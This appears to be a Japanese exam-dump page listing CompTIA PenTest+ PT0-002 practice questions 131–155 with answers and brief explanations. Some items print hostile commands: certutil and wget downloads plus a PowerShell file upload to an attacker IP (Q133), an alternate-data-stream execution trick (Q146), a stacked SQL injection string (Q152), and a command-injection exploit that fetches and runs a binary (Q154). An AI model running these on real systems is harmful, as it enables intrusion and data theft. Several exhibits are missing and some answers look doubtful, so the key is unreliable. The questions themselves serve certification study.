• ホーム
  • ブログ
  • [2023年最新] 高合格率な最新PT0-002テストノートとPT0-002高合格率な試験ガイドを試そう [Q131-Q155]

[2023年最新] 高合格率な最新PT0-002テストノートとPT0-002高合格率な試験ガイドを試そう [Q131-Q155]

Share

[2023年最新] 高合格率な最新PT0-002テストノートとPT0-002高合格率な試験ガイドを試そう

PT0-002実際の問題アンサーPDFには100%カバーリアル試験問題

質問 # 131
A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

  • A. Decrypt the authorization header using bcrypt.
  • B. Decode the authorization header using Base64.
  • C. Decrypt the authorization header using AES.
  • D. Decode the authorization header using UTF-8.

正解:B


質問 # 132
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

  • A. Familiarity and likeness
  • B. Authority and urgency
  • C. Scarcity and fear
  • D. Social proof and greed

正解:B


質問 # 133
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
  • C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

正解:A

解説:
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk


質問 # 134
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

  • A. The tester found evidence of prior compromise within the data set.
  • B. The tester reached the end of the assessment time frame.
  • C. The tester completed the assigned part of the assessment workflow.
  • D. The tester had the situational awareness to stop the transfer.

正解:D

解説:
Explanation
Situational awareness is the ability to perceive and understand the environment and events around oneself, and to act accordingly. The penetration tester demonstrated situational awareness by stopping the transfer of PII, which was out of scope and could have violated the ROE or legal and ethical principles. The other options are not relevant to the situation or the decision of the penetration tester.


質問 # 135
A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

  • A. The web server is using a WAF.
  • B. The local antivirus on the web server Is rejecting the connection.
  • C. The web server is behind a load balancer.
  • D. The web server is redirecting the requests.

正解:A

解説:
Explanation
A Web Application Firewall (WAF) is designed to monitor, filter or block traffic to a web application. A WAF will monitor incoming and outgoing traffic from a web application and is often used to protect web servers from attacks such as SQL Injection, Cross-Site Scripting (XSS), and other forms of attacks. If a WAF detects an attack, it will often reset the TCP connection, causing the connection to be terminated. As a result, a penetration tester may see TCP resets when a WAF is present. Therefore, the most likely reason for the TCP resets returning from the web server is that the web server is using a WAF.


質問 # 136
A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]
Which of the following is MOST likely to be reported by the consultant?

  • A. An ARP flooding attack is using the broadcast address to perform DDoS.
  • B. A multicast session was initiated using the wrong multicast group.
  • C. A device on the network has an IP address in the wrong subnet.
  • D. A device on the network has poisoned the ARP cache.

正解:D

解説:
The gateway for the network (192.168.1.1) is at 0a:d1:fa:b1:01:67, and then, another machine (192.168.1.136) also claims to be on the same MAC address. With this on the same network, intermittent connectivity will be inevitable as along as the gateway remains unreachable on the IP known by the others machines on the network, and given that the new machine claiming to be the gateway has not been configured to route traffic.


質問 # 137
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
  • B. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
  • C. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
  • D. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan

正解:B


質問 # 138
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

  • A. testing adds to the workload of defensive cyber- and threat-hunting teams.
  • B. testing can make detecting actual APT more challenging.
  • C. business and network operations may be impacted.
  • D. security compliance regulations or laws may be violated.

正解:C


質問 # 139
During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

  • A. SOW.
  • B. SLA.
  • C. NDA
  • D. ROE.

正解:D

解説:
Explanation
https://mainnerve.com/what-are-rules-of-engagement-in-pen-testing/#:~:text=The%20ROE%20includes%20the%


質問 # 140
A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?

  • A. DirBuster
  • B. OWASP ZAP
  • C. w3af
  • D. SQLmap

正解:B


質問 # 141
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

  • A. nmap 192.168.1.1-5 -Ss22-25,80
  • B. nmap 192.168.1.1-5 -PS22-25,80
  • C. nmap 192.168.1.1-5 -PA22-25,80
  • D. nmap 192.168.1.1-5 -PU22-25,80

正解:B

解説:
PS/PA/PU/PY are host discovery flags which use TCP SYN/ACK, UDP or SCTP discovery respectively. And since the ports in the options are mostly used by TCP protocols, then it's either the PS or PA flag. But since we need to know if the ports are live, sending SYN packet is a better alternative. Hence, I choose PS in this case.


質問 # 142
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

  • A. may reduce the true positive rate of findings.
  • B. will reveal vulnerabilities in the Modbus protocol.
  • C. may cause unintended failures in control systems.
  • D. will create a denial-of-service condition on the IP networks.

正解:C


質問 # 143
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?

  • A. The tester input the incorrect IP address.
  • B. The command requires the -port 135 option.
  • C. PowerShell requires administrative privilege.
  • D. An account for RDP does not exist on the server.

正解:D


質問 # 144
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)

  • A. Phishing company employees
  • B. Crawling the client's website
  • C. Conducting wardriving near the client facility
  • D. Utilizing DNS lookup tools
  • E. Scraping social media sites
  • F. Using the WHOIS lookup tool

正解:B、E

解説:
Technical and billing addresses are usually posted on company websites and company social media sites for the their clients to access. The WHOIS lookup will only avail info for the company registrant, an abuse email contact, etc but it may not contain details for billing addresses.


質問 # 145
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

正解:

解説:

Explanation
1. Reflected XSS - Input sanitization (<> ...)
2. Sql Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - paramtrized queries
7. SQLi error - paramtrized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input saniti $
10. URL redirect - prevent external calls


質問 # 146
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. MP4 steganography
  • C. PsExec
  • D. PowerShell modules

正解:A

解説:
Explanation
Alternate data streams (ADS) are a feature of the NTFS file system that allows storing additional data in a file without affecting its size, name, or functionality. ADS can be used to hide or embed data or executable code in a file, such as a specially crafted binary for later execution. ADS can be created or accessed using various tools or commands, such as the command prompt, PowerShell, or Sysinternals12. For example, the following command can create an ADS named secret.exe in a file named test.txt and run it using wmic.exe process call create function: type secret.exe > test.txt:secret.exe & wmic process call create "cmd.exe /c test.txt:secret.exe"


質問 # 147
A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:
IP Address: 192.168.1.63
Physical Address: 60-36-dd-a6-c5-33
Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

  • A. tcpdump -i eth01 arp and arp[6:2] == 2
  • B. ipconfig /all findstr /v 00-00-00 | findstr Physical
  • C. route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1
  • D. arp -s 192.168.1.63 60-36-DD-A6-C5-33

正解:D

解説:
Explanation
The arp command is used to manipulate or display the Address Resolution Protocol (ARP) cache, which is a table that maps IP addresses to physical addresses (MAC addresses) on a network. The -s option is used to add a static ARP entry to the cache, which means that it will not expire or be overwritten by dynamic ARP entries.
The syntax for adding a static ARP entry is arp -s <IP address> <physical address>. Therefore, the command arp -s 192.168.1.63 60-36-DD-A6-C5-33 would add a static ARP entry for the IP address 192.168.1.63 and the physical address 60-36-DD-A6-C5-33 to the local cache of the attacker machine. This would allow the attacker machine to communicate with the target machine without relying on ARP requests or replies. The other commands are not valid or useful for establishing a static ARP entry.


質問 # 148
Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

  • A. MSA
  • B. SOW
  • C. NDA
  • D. SLA

正解:B

解説:
Explanation
The document that is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables is the SOW (Statement of Work). The SOW is a formal document that describes the objectives, expectations, and responsibilities of the penetration-testing project2. The SOW should be clear, concise, and comprehensive to avoid any ambiguity or misunderstanding.


質問 # 149
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?

  • A. Encryption
  • B. Steganography
  • C. Encode64
  • D. Metadata removal

正解:B


質問 # 150
A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

  • A. Empire
  • B. ProxyChains
  • C. OWASPZAP
  • D. Nessus

正解:B


質問 # 151
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

  • A. Deconflict with the penetration tester.
  • B. Assume the alert is from the penetration test.
  • C. Halt the penetration test.
  • D. Contact law enforcement.

正解:A

解説:
Explanation
Deconflicting with the penetration tester is the best thing to do next after the security alarms are triggered during a penetration test, as it will help determine whether the alarm was caused by the tester's activity or by an actual threat. Deconflicting is the process of communicating and coordinating with other parties involved in a penetration testing engagement, such as security teams, network administrators, or emergency contacts, to avoid confusion or interference.


質問 # 152
A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:
1;SELECT Username, Password FROM Users;
Which of the following injection attacks is the penetration tester using?

  • A. Error-based
  • B. Boolean SQL
  • C. Blind SQL
  • D. Stacked queries

正解:D

解説:
Explanation
The penetration tester is using a type of injection attack called stacked queries, which means appending multiple SQL statements separated by semicolons in a single input field. This can allow the penetration tester to execute arbitrary SQL commands on the database server, such as selecting username and password from users table.


質問 # 153
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  • A. Analyze the malware to see what it does.
  • B. Remove the malware immediately.
  • C. Stop the assessment and inform the emergency contact.
  • D. Collect the proper evidence and then remove the malware.
  • E. Do a root-cause analysis to find out how the malware got in.

正解:C

解説:
Explanation
Stopping the assessment and informing the emergency contact is the best thing to do next after identifying that an application being tested has already been compromised with malware. This is because continuing the assessment might interfere with an ongoing investigation or compromise evidence collection. The emergency contact is the person designated by the client who should be notified in case of any critical issues or incidents during the penetration testing engagement.


質問 # 154
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. grep -v apache ~/.bash_history > ~/.bash_history
  • B. taskkill /IM "apache" /F
  • C. rm -rf /tmp/apache
  • D. chmod 600 /tmp/apache

正解:C


質問 # 155
......

PT0-002試験問題とアンサー:https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

合格できるPT0-002試験情報と無料練習テスト:https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy

関するブログ

もっと
PT0-002無料問題集